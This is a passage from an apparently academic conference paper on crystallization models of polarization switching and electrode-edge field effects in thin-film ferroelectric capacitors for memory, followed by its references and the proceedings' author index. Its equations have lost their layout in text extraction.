difficulties. Therefore, the crystallization model of ferroelectric repolarization is based on the following simplifications: • The volume of ferroelectric is considered unlimited and the influence of the surface on the formation and growth of domains can be neglected. • Uniform distribution of the centers of formation of embryos of domains or hidden embryos oriented on the field. This allows the nucleation process to be characterized by intensity χ (t), which is equal to the number of embryos occurring per unit volume per unit time (χ -process). Similarly, the initial distribution of hidden domain embryos is characterized by the density of embryos β, that is, the number of embryos per unit volume (β-process). • All embryos of domains, regardless of the place and time of their origin, as well as hidden embryos, have the same shape and retain it during growth. This allows you to determine the volume of domains at any time as a function of one spatial variable radius R(t) and one parameter of the k-form factor. If the domains are spherical, then its volume 43 π R3 and shape ratio k = 43 π . In the cylindrical shape of domains, its volume is equal 2π R3 (provided that the height of the cylinder is equal to its diameter) and form factor k = 2π . In the cubic form of domains k = 8, if all the edges of the cube are equal 2R. For ferroelectric thin films, the repolarization time is determined mainly by the lateral growth of the needle domains. In this case, with a cylindrical shape of the domains, their volume is equal π R2 h, where h film thickness, and form factor k = π h. • At every moment the speed of movement of the domain walls in all directions is the same. When the fronts of adjacent domains collide, the oncoming domains continue to grow without noticing each other. This simplification increases the volume of the repolarized part of the ferroelectric, and to compensate for this phenomenon, it is assumed that the repolarized and nonpopolarized fractions of any unit volume taken together do not exceed a unit volume. Formulation of a Mathematical Model Consider a unit volume in an unlimited ferroelectric in which time t = 0 created an electric field with a voltage sufficient to reorient the polarization. Denote by q(ξ ) not repolarized fraction of a unit volume for a moment ξ > 0. Then, the number of germs of field-oriented domains that arise over time from ξ to ξ + d ξ at χ –process will be equal to dn(ξ ) = χ (ξ )q(ξ )d ξ . The formed embryos will begin to grow for a moment t > ξ its radius will be defined t R(ξ, t) = RC +
V (t)dt,
(25)
ξ
where RC – the average radius of the embryos of the domains at the time of its occurrence or the average radius of the hidden domains of reverse polarity, and V (t) is the domain growth rate. If V (t) = V = const, then expression (25) takes the form R(ξ, t) = RC + V (t − ξ )
Mathematical Model of Electric Polarization Switching
761
Increasing the repolarized fraction of a unit volume over time from ξ to t (t > ξ ), due to embryos that have arisen over time (ξ, ξ + d ξ ) will be dQ(ξ ) = χ (ξ )q(ξ )kRn (ξ )d ξ.
(26)
Since the increase in the repolarized fraction of a unit volume is equal to the decrease in the non-polarized fraction, the latest will be determined dq(ξ ) = −dQ(ξ ) = −χ (ξ )q(ξ )kRn (ξ, t)d ξ.
(27)
Rewriting relation (26) in the form of equation dq(ξ ) = −χ (ξ )RRn (ξ, t)d ξ q(ξ )
(28)
and integrating it in the range from 0 to t, we obtain the time dependence of the nonpolarized part of the unit volume q(t) = q(0) exp(−A)
(29)
where t A=
χ (ξ )kRn (ξ, t)d ξ
(30)
0
characteristic parameter χ -process, for which q(0) = 1. In the case of β-process can be considered χ (ξ ) = βδ(ξ ), where δ(ξ ) is the unit impulse function, and convert expression (30) to the form A = βkRn (t),
(31)
where R(t) is determined by the expression (25), at ξ = 0. Also for β-process, q(0) < 1 the proportion of unit volume that is accounted for by embryos of hidden field-oriented domains. Since this fate is almost impossible to determine, the fate is assumed to be for β-process, q(0) = 1. Repolarized fraction of a unit volume χ - and β-processes Q(t) = 1 − exp(−A).
(32)
Determination of Polarization and Current Density χ -Process Since polarization is defined as the total dipole moment of a unit volume, assuming that in the repolarized part of the ferroelectric polarization PS , and in non-polarized -PS , it will be obtained P = PS Q(t) − PS q(t) = PS 1 − 2 exp(−A) , (33) and the current density δ=
dP = 2PS A exp(−A), dt
(34)
762
I. Baraban et al.
where A is determined by the ratio (30), and dA A = = knV (t) dt
t χ (ξ )Rn−1 (ξ, t)d ξ.
(35)
0
In the simplest case χ (ξ ) = χ = const, V (t) = V∞ exp −α E = const and provided that RC = 0, expressions (33) and (34), considering (25), are transformed into the forms t n+1 P , (36) = 1 − 2 exp −A0 e−nα / E · PS n+1 t n+1 δ = 2A0 PS e−nα / E · t n exp −A0 e−nα / E , (37) n+1 n . where A0 = χ kV∞ At repolarization of thin films by lateral growth of needle cylindrical domains
P = 1 − 2 exp −A0 e−2α / E · t 3 , PS 1 −2α / E 2 −2α / E 3 · t exp − A0 e t , δ = 2A0 PS e 3
(38) (39)
where A0 = 13 π χ hV 2 (h – film thickness). The external structure of expressions (36) or (38) is similar to the similar expression (4) for polarization in the 1st order model: the arguments of the external exponents of both expressions are determined by the product of two factors, one of which is a field intensity function and the other a time function. However, in the crystallization model, there is a multiplier in the exponent n ≥ 1. Therefore, when n > 1 the polarization characteristic of the crystallization model will be shifted to the right (towards higher intensities) compared to the physical model of the 1st order. The time factor in the exponent (see (36)) has the power n + 1 > 1. It follows that the switching characteristic will grow more slowly at the beginning, cross the time axis at a greater angle and approach the saturated value more slowly. Numerical estimates of the switching field intensity and its relationship to the duration of the switching pulse, as well as the maximum value of the current density and the corresponding moment, are complicated by the lack of numerical values of the parameters of the crystallization model, such as χ , V∞ , k and n (n – can take small values when mixed χ - and β-processes). These parameters should be determined by comparing experimental and theoretical results so that differences between them are minimal. For convenience of such comparison it is expedient to pass to dimensionless parameters. Standardization of Crystallization Model Parameters (χ -Process) It is expedient to take as normalizing values saturation polarization PS , the maximum value of current density δm and time tm, at which this maximum is observed. Rationing will be carried out for the previously mentioned simplest case χ (ξ ) = χ = const,
Mathematical Model of Electric Polarization Switching
763
V (t) = V = const, but RC = 0. Under these conditions, relation (30), taking into account (2.1), can be given the form A=
t + tC t0
n+1
−
tC t0
n+1 ,
(40)
where RC , t0 = tC = V
n+1 kχ V n
1 n+1
,
(41)
and convert expressions (33) and (34) n+1 t+t n+1 P tC − tC 0 = 1 − 2 exp e , PS t0 n+1 t+t n+1 t + tC n PS tC − tC 0 δ = 2 (n + 1) exp e . t0 t0 t0
(42)
(43)
Time t C is the time of doubling the radius of the embryo, and time t 0 has the content of the time constant χ -process, i.e. t 0 is the time during which the variable component of polarization in expression (24) decreases by e ≈ 2, 718 times, provided that the time t C is negligibly small. Analysis of expression (43) to the extremum gives the following values of the maximum current density δm and time t m , respectively n+1 1 PS tC n n+1 δm = 2 exp , (n + 1)(n/ e) t0 t0 1 n+1 n tC − tm = t0 . n+1 t0
(44)
(45)
From expression (45) it follows that the time constant, depending on the dimension of growth n, varies within t0 ≈ (0, 71 − 0, 93)(tm + tC ), that is, it can be as small t m (t C – small), and as a large t m (t C – large). Generalized parameter χ –process is a dimensionless quantity ! " n+1 n δm tm a 2n exp = −1 , PS 1+a n+1 1+a where a = tC tm . Entering further the normalized time θ = t tm , convert expressions (42), (43) to the form P(θ ) − n = 1 − 2K1 e n+1 PS
a+θ 1+a
n+1
,
(46)
764
I. Baraban et al. n+1 n a+θ a + θ n − n+1 δ(θ ) 1+a = K2 e , δm 1+a
where
(47)
n+1 n a K1 = exp , n+1 1+a n K2 = exp . n+1
nuclei is negligibly small The value of K 1 = 1, if the initial radius of the domain (tC = tm ), and slowly increases with its increase (∂K1 ∂a = 0, at a = 0). The value K2 with increasing dimension of domains from n = 1 to n = 3, increases from about 1.6 to 2.1. Determination of Polarization and Current Density β-Process The polarization and current density of the β-process are also determined by the ratios (42) and (43), in which the parameter A is given by expression (31), and the corresponding derivative A = βknV (t)Rn−1 (t). If V (t) = V∞ exp −α E = const and RC = 0, then the polarization and current density of the β-process are determined nα P = 1 − 2 exp −B0 e− E t n , PS nα nα δ = 2B0 ne− E t n−1 exp −B0 e− E t n ,
(48) (49)
n . where B0 = βkV∞ At repolarization of thin films by lateral growth of needle cylindrical domains
2α P = 1 − 2 exp −B0 e− E t 2 , PS 2α 2α δ = 4B0 e− E t exp −B0 e− E t 2 ,
(50) (51)
2 . where B0 = βπ hV∞ All that has been said before regarding the comparison of characteristics χ –process and physical model of the 1st order, as well as the possibility of numerical estimates of parameters χ –process, are preserved for β-process. So for the β-process under the condition, that both V (t) = V = const and RC = 0 expressions (42) and (43) are converted to the form # $ t + tC n , (52) P = PS 1 − 2 exp − t0
Mathematical Model of Electric Polarization Switching
δ=2
PS t + tC n−1 t + tC n , n exp − t0 t0 t0
765
(53)
where tC = RC V i t0 = (V n kβ)−1/ n is a quantities which physical meaning is the same as for χ –process. The maximum current density δm and the corresponding time tm , for the β-process are determined by expressions 1/ n PS n − 1 n−1 δm = 2 , n t0 e n − 1 1 / n tC tm = t0 − , n t0
(54)
(55)
by which we find δm t m tm n−1 = 2(n − 1) exp − . PS tm + tC n
(56)
Normalized characteristics of the β- process are determined similarly
n
P(θ ) − n−1 θ+a = 1 − 2e n 1+a , (57) PS n θ+a a + θ n−1 − n−1 δ(θ ) n 1+a = K3 e , (58) δm 1+a where K3 = exp n − 1 n . A comparison of the normalized characteristics (46) and (47) of the χ –process and the corresponding characteristics (57) and (58) of the β-process shows that the latest have a unit smaller dimension. Because it can actually take place at the same time χ – and β–processes, then the dimensional growth of the domains may take non-target values. The final conclusions about the adequacy of crystallization models to the processes of repolarization of ferrocapacitors could be made by comparing experimental and theoretical results under the conditions of optimal determination of the parameters of crystallization models.
4 Analysis of the Influence of Polarizing Field Inhomogeneity on the Characteristics of Ferrocapacitors Reducing the size of ferroelectric memory elements and increasing the density of its packaging is accompanied by both a deterioration in the characteristics of the elements and an increase in parasitic connections between it [14]. These phenomena associated with the inhomogeneity of the polarizing field near the electrode boundaries are called boundary field effects [15].
766
I. Baraban et al.
The level of influence of the field effects at the characteristics of ferroelectric capacitors depends on the relationship between the thickness of the ferroelectric film and the size and shape of the electrodes, as well as the dielectric properties of the film and the environment. For real capacitor storage batteries, it is almost impossible to estimate the influence of all factors on its dynamic characteristics. Therefore, we analyzed the influence of the field effects on the polarization characteristic in the static mode for the simplest form of electrodes and provided that the ferromaterial has a rectangular hysteresis loop.
Fig. 4. Distribution of plane-parallel electric field intensity: bold - electrode lines; thin - lines of equal intensity.
In Fig. 4 one of the options for the relative position of the boundaries of the electrodes of two adjacent capacitors made on a common ferroelectric film is shown. The electrodes of capacitors with static potentials ϕ1 = ϕ and ϕ2 = ϕ3 = 0 are represented by bold lines, and the figure of the distribution of traces of surfaces of equal intensity of a plane-parallel field - by thin lines, next to which the relative values of the voltage are indicated [16]. Each line of equal voltage divides the ferroelectric into two parts: in one part the voltage is less than on the line, and in the other - more. The directions of intensity reduction are set by the field lines l1 and l2 , which limit the working area with inhomogeneous intensity selected when reading or writing the element (power line l1 is the last out of the electrode 1 and ends at the common for both capacitors electrode 3; to the left of the line the electric field is almost homogeneous). As the voltage increases (potential growth ϕ) the region near the electrode 1 is first repolarized (one of such areas in Fig. 4 is shaded). Then the repolarized region expands,
Mathematical Model of Electric Polarization Switching
767
increasing the average value of the polarization of the working region of the ferrocapacitor. The corresponding dependence of the average polarization on the field intensity is shown in Fig. 5, where curve 1 is the initial polarization characteristic, 2 is the polarization characteristic at the cyclic change of the field strength, the intensity of which is insufficient to achieve saturation polarization and 3 is the limiting polarization characteristic. Thus, the rectangular hysteresis loop of the ferromaterial due to the inhomogeneity of the polarization field, is converted into a non-rectangular polarization characteristic of the ferrocapacitor [17–19].
Fig. 5. Hysteresis loops of a ferroelectric capacitor in an inhomogeneous electric field: 1 - initial; 2 - partial; 3 – bordered.
Reducing the rectangularity of the polarization characteristic has a corresponding effect on the switching characteristic, i.e. the polarization increases more slowly in time at the beginning and more slowly approaches the saturation at the end. As a result, the polarization switching is delayed, the switching time increases and the maximum value of the repolarization current decreases. The latter requires an increase in the size of the
768
I. Baraban et al.
electrodes of thin-film ferrocapacitors and a corresponding decrease in the density of its packaging. The negative effect of the edge effects of the field at the ferroelectric memory is also manifested in the fact that the areas of high voltage near the boundaries of the electrodes, not selected when reading or writing elements, will be parasitically repolarized. Parasitic repolarization most likely cannot lead to erroneous reading, because the regions of such repolarization are small. However, to prevent, even with unlikely erroneous readings, it is necessary to choose such variants of matrix addressing, in which the zones of parasitic repolarization will be minimal. In addition, parasitic repolarization of adjacent elements will reduce its read signal when these elements are selected. To eliminate this effect, it is also needed to increase the size of the elements and the distance between it. To quantify the influence of the field effects on the characteristics of ferrocapacitors, we introduce the concept of the coefficient of rectangularity of the polarization characteristic, which is determined by the ratio of coercive intensity (intensity at which polarization changes sign) to voltage at which the polarization is 0.9PS (PS is the saturation polarization). The static coefficient of rectangle is easily determined by the static hysteresis loops of Fig. 5. So for the boundary hysteresis loop (curve 3) the coefficient of rectangle KP ≈ 1 1, 7 ≈ 0, 6. The obtained value corresponds to the ferrocapacitor at Fig. 4, in which the working area of the ferroelectric is limited by power lines l1 and l2 . If the working area in the direction of the homogeneous field is larger, then the the coefficient of rectangle is greater. The value of the rectangularity coefficient KP = 0, 6 should be considered the minimum allowable. This is the coefficient of rectangularity should be considered when determining the minimum size of thin-film ferrocapacitors, when designing ferroelectric storage devices [17–19].
5 Conclusions Literature and Internet researches on switching of polarization of ferroelectric capacitors are carried out. It has been found that the research methods developed in recent decades from the first principles are suitable only for modeling a limited range of basic devices of nanoscale of small complexity. On the other hand, the lack of a universal macroscopic model of polarization switching, true for all classes of ferroelectrics, led to the development of “behavioral” models, the parameters of which are determined by experimental studies of storage cells manufactured according to certain technological standards. Classical models of switching the polarization of ferroelectric capacitors have been studied, according to which families of switching and polarization characteristics are constructed for different laws of change in time of polarizing fields. According to the research results, numerical estimates of the model parameters (maximum value of current density, switching time, dynamic coercive voltage) are carried out, which correspond to the experimental results obtained for capacitors on bulk ferroelectrics. The suitability of the studied models to describe the switching of the polarization of thin-film ferrocapacitors of nanoscale is clarified after the manufacture of such capacitors and the measurement of its parameters.
Mathematical Model of Electric Polarization Switching
769
Crystallization models of polarization switching have been developed, the parameters of which should be determined by comparing theoretical and experimental results so that the differences between it are minimal. The calculations of the polarizing field near the boundaries of the electrodes of thinfilm ferrocapacitors are performed, on which the diagrams of voltage distribution in its working zones are constructed. According to the results of calculations, the polarization characteristics of ferrocapacitors are constructed, which reveal the influence of the field effects on the rectangularity of the polarization and switching characteristics. It has been found that reducing the rectangularity of the characteristics delays the polarization process over time and increases the switching time, reduces the maximum value of the polarization current density and strengthens the parasitic bonds between capacitors made on a single ferroelectric film. These negative phenomena limit both the minimum size of the elements and the density of their packaging, as well as possible options for matrix addressing of storage devices. In addition, the read signal of the selected elements is reduced due to the parasitic polarization of the electrode layers, which occurs when the element was adjacent but unselected. To take into account the negative impact of the field effects of the field on the ferroelectric RAM8, it is proposed to use the coefficient of rectangularity of the polarization characteristics, the value of which depends on the ratio between the electrode size and the thickness of the ferroelectric film.
References 1. You, W., Su, P., Hu, C.: A new 8T hybrid nonvolatile SRAM with ferroelectric FET. IEEE J. Electron Devices Soc. 8, 171–175 (2020). https://doi.org/10.1109/JEDS.2020.2972319 2. Kobayashi, M., Tagawa, Y., Mo, F., Saraya, T., Hiramoto, T.: Ferroelectric HfO2 tunnel junction memory with high TER and multi-level operation featuring metal replacement process. IEEE J. Electron Devices Soc. 7, 134–139 (2019). https://doi.org/10.1109/JEDS.2018.288 5932 3. Yves, O., Frank, I.: Consistent and efficient modeling of the nonlinear properties of ferroelectric materials in ceramic capacitors for frugal electronic implants. Sensors 20, 4206 (2020). https://doi.org/10.3390/s20154206 4. Dobrusenko, S.A.: Segnetoelectricheskie OZU firmy Ramtron International. – Electronika: nauka, tehnologiya, biznes, №4:14–20 (2003) 5. Olsommer, Y., Ihmig F., Müller, C.: Modeling the nonlinear properties of ferroelectric materials in ceramic capacitors for the implementation of sensor functionalities in implantable electronics. In: Proceedings of the 6th International Electronic Conference on Sensors and Applications, vol. 42, p. 61 (2020). https://doi.org/10.3390/ecsa-6-06575 6. Raman, R.T., Ajoy, A.: SPICE-based multiphysics model to analyze the dynamics of ferroelectric negative-capacitance–electrostatic MEMS hybrid actuators. IEEE Trans. Electron Devices 67(11), 5174–5181 (2020). https://doi.org/10.1109/TED.2020.3019991 7. Praveen, J., Kumar, M., Sreecharan, B.R., Shruthi, I.T., Rachita, B.V.G.: Design of memory interface and programmer for ferroelectric random access memory (FeRAM). Int. J. Adv. Sci. Technol. 29(08), 4799–4806 (2020). ISSN: 2005–4238 IJAST 8. Jiang, B., Lee, J.C., Zurcher, P.: Modeling ferroelectric capacitor switching using a parallelelements model. Integr. Ferroelectr. 16(1–4), 199–208 (1997). https://doi.org/10.1080/105 84589708013042
770
I. Baraban et al.
9. Tamura, T., Arimoto, Y., Ishiwara, H.: A parallel element model for simulating switching response of ferroelectric capacitors. IEICE Trans. Electron. E84-C(6), 785–790 (2001) 10. Musielak, Z.E., Davachi, N., Rosario-Franco, M.: Special functions of mathematical physics: a unified Lagrangian formalism. Mathematics 8(3), 379 (2020). https://doi.org/10.3390/mat h8030379 11. Andrei, N.: Kolmogorov Prepared by VM Tikhomirov. Wolf Prize in Mathematics, v.2, World Scientific, pp. 119–141 (2001). ISBN 9789812811769 12. Faleiros, A.C., Rabelo, T.N., Thim, G.P.: Kinetics of phase change. Mater. Res. 3(3), 51–60 (2000). https://doi.org/10.1590/S1516-14392000000300002 13. Li, L., Xie, L., Pan, X.: Real-time studies of ferroelectric domain switching: a review. In: Reports on Progress in Physics, vol. 82(12). Published 7 November, IOP Publishing Ltd (2019). https://doi.org/10.1088/1361-6633/ab28de 14. Semenov, A.O., Baraban, S.V., Osadchuk, O.V., Semenova, O.O., Koval, K.O., Savytskyi, A.Y.: Microelectronic pyroelectric measuring transducers. In: Tiginyanu, I., Sontea, V., Railean, S. (eds.) ICNBME 2019. IP, vol. 77, pp. 393–397. Springer, Cham (2020). https:// doi.org/10.1007/978-3-030-31866-6_72 15. Semenov, A.A., Voznyak, O.M., Vydmysh, A.A., et al.: Differential method for measuring the maximum achievable transmission coefficient of active microwave quadripole. J. Phys: Conf. Ser. 1210, 1–8 (2019). https://doi.org/10.1088/1742-6596/1210/1/012125 16. Semenov, A.A., Baraban, S.V., Baraban, M.V., et al.: Development and research of models and processes of formation in silicon plates p-n junctions and hidden layers under the influence of ultrasonic vibrations and mechanical stresses. In: Key Engineering Materials, vol. 844, pp. 155–167. Trans Tech Publications, Ltd, (2020). https://doi.org/10.4028/www.scientific. net/kem.844.155 17. Semenova, O, Semenov, A., et al.: The neural network for vertical handover procedure. In: 2020 IEEE International Conference on Problems of Infocommunications. Science and Technology (PIC S&T), 2020, Kharkiv, Ukraine, pp. 753–756 (2020). https://doi.org/10.1109/ PICST51311.2020.9468033 18. Semenov, A.A., Semenova, O.O., Voznyak, O.M., Vasilevskyi, O.M., Yakovlev, M.Y.: Routing in telecommunication networks using fuzzy logic. In: 2016 17th International Conference of Young Specialists on Micro/Nanotechnologies and Electron Devices (EDM), pp. 173–177 (2016). https://doi.org/10.1109/EDM.2016.7538719 19. Semenova, O., Semenov, A., Koval, K., Rudyk, A., Chuhov, V.: Access fuzzy controller for CDMA networks. Int. Siberian Conf. Control Commun. (SIBCON) 2013, 1–2 (2013). https:// doi.org/10.1109/SIBCON.2013.6693644
Author Index
A Arhat, Roman 459 Atamanchuk, Petro 249 Atamanchuk, Viktoriia 249 B Baikenov, Alimzhan 177 Baraban, Inna 749 Baraban, Mariia 749 Baraban, Serhii 749 Batrachenko, Olexandr 363, 386 Bazeliuk, Nataliia 275 Bazilo, Constantine 3, 260, 411 Bielinskyi, Andrii 323, 425 Bilets, Daria 446 Bondar, Serhii 208 Bondarenko, Yevhenii 113 Bondarenko, Yuliia 113 Borodiyenko, Oleksandra 275 Boyko, Victor 224 Bryukhanov, Arkady 425 Buriachok, Volodymyr 533 C Chalyy, Kyrylo 515 Chumachenko, Dmytro 503 Chumachenko, Tetyana 503 D Derevianko, Igor 459 Dluhopolskyi, Oleksandr 346 Donchev, Ivan 425 Drach, Iryna 275 Dyachok, Dmytro 425 F Faure, Emil 3, 177 Fedorov, Eugene 113
Frolova, Liliya 567 Frolova, Liudmyla 260 Fursenko, Tetiana 65 G Gabrousenko, Yevhen 13, 196 Gagnidze, Avtandil 619 Gasii, Grygorii 102 Gnatyuk, Sergiy 235, 619, 656 Grebenovych, Julia 30 H Halchenko, Volodymyr 411 Hasii, Olena 102 Holubnychyi, Oleksii 13, 196 Honcharov, Artem 83 Hrynzovskyi, Anatolii 515 Hryshchenko, Yurii 65 I Iashvili, Giorgi 619, 656 Iavich, Maksim 619, 656 Ivashchuk, Oleg 51 K Kataeva, Yevheniia 149 Kavetskyy, Taras 425 Khlevna, Iulia 149 Khlevny, Andrii 149 Khrulov, Mykola 162 Kiv, Arnold 425 Klevanna, Ganna 149 Korshun, Nataliia 533 Kostenko, Anton 459 Kovalenko, Andriy 715 Kovalenko, Stanislav 260 Krasnozheniuk, Yana 635, 679 Kryvenko, Inna 515
© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 771–773, 2023. https://doi.org/10.1007/978-3-031-35467-0
772
Kulakov, Pavlo 599 Kulakova, Anna 599 Kulia, Yuliia 732 L Lavdanskyi, Artem 3 Lebedev, Vladimir 446 Liubchenko, Kostiantyn 260 Lizunkov, Oleksandr 102 Lukashin, Viktor 425 Lutskyi, Maksym 235 Lytovchenko, Volodymyr 299 M Makarenko, Iryna 113 Maksymchuk, Olena 346 Maksymov, Anton 131 Martovytskyi, Vitalii 715 Matviychuk, Andriy 323 Meniailov, Ievgen 503 Miroshnichenko, Denis 446 Mogilei, Sergii 83 Muradyan, Olena 503 Mysiak, Vsevolod 446 N Nedonosko, Petro 30 O Odarchenko, Roman 208, 619, 656 Onyshchenko, Borys 30 Orel, Vadim 459 Ostroumov, Ivan 51
Author Index
S Salenko, Alexandr 459 Samusenko, Aleksandr 459 Savchenko, Dmytro 446 Savchenko, Mykhailo 552 Savchenko-Synyakova, Yevheniya Semenov, Andriy 599, 749 Semenova, Olena 599, 749 Semerikov, Serhiy 323 Sergeyeva, Olga 567 Shcherba, Anatoly 177 Shcherbyna, Olga 196 Shmygaleva, Tat’yana 484 Shostko, Igor 732 Sievierinov, Oleksandr 715 Simonov, Sergei 656 Skladannyi, Pavlo 533 Skrynnik, Ivan 102 Skutskyi, Artem 3 Slatvinska, Valeria 224 Slobodian, Olexandr 13 Slobodianiuk, Olena 275 Smirnov, Oleksii 208 Smirnova, Tatiana 208 Sokolov, Volodymyr 533 Soloviev, Vladimir 323, 425 Solovieva, Victoria 323 Srazhdinova, Aziza 484 Stupka, Bohdan 177 Suprunenko, Oksana 30 Synytsya, Kateryna 552 Sysoienko, Svitlana 162
P Pastushenko, Mykola 679 Petrenko, Yuriy 260 Petroye, Olha 275 Pidhornyy, Mykola 299 Podskrebko, Oleksandr 346 Polozhentsev, Artem 235 Prodanova, Larysa 582
T Taranenko, Anatolii 13, 196 Tazetdinov, Valeriy 162 Teslia, Iurii 149 Tokar, Liubov 635 Trembovetska, Ruslana 411 Tryus, Yurii 83, 131 Tsurkan, Daniil 459 Tychkova, Natalia 411 Tykhomyrova, Tetiana 446
R Romanenko, Victor 65 Ruban, Andrii 260 Ruban, Igor 715 Rudyk, Andrii 599, 749
V Vasilenko, Mykola 224 Vasylyshyn, Volodymyr 697 Verkhovets, Oleksii 235 Volosheniuk, Dmytro 208
552
Author Index
773
Voronenko, Iryna 177 Voznyak, Oleksandr 599 W Wołowiec, Tomasz
346
Y Yegorchenkov, Oleksii 149 Yegorchenkova, Nataliia 149
Z Zagirnyak, Mykhaylo 459 Zakharova, Oksana 582 Zaliskyi, Maksym 65, 196 Zatonatska, Tetiana 346 Zharova, Olena 13 Zholtkevych, Grigoriy 503 Zhyltsov, Oleksii 533 Zinchuk, Andryi 459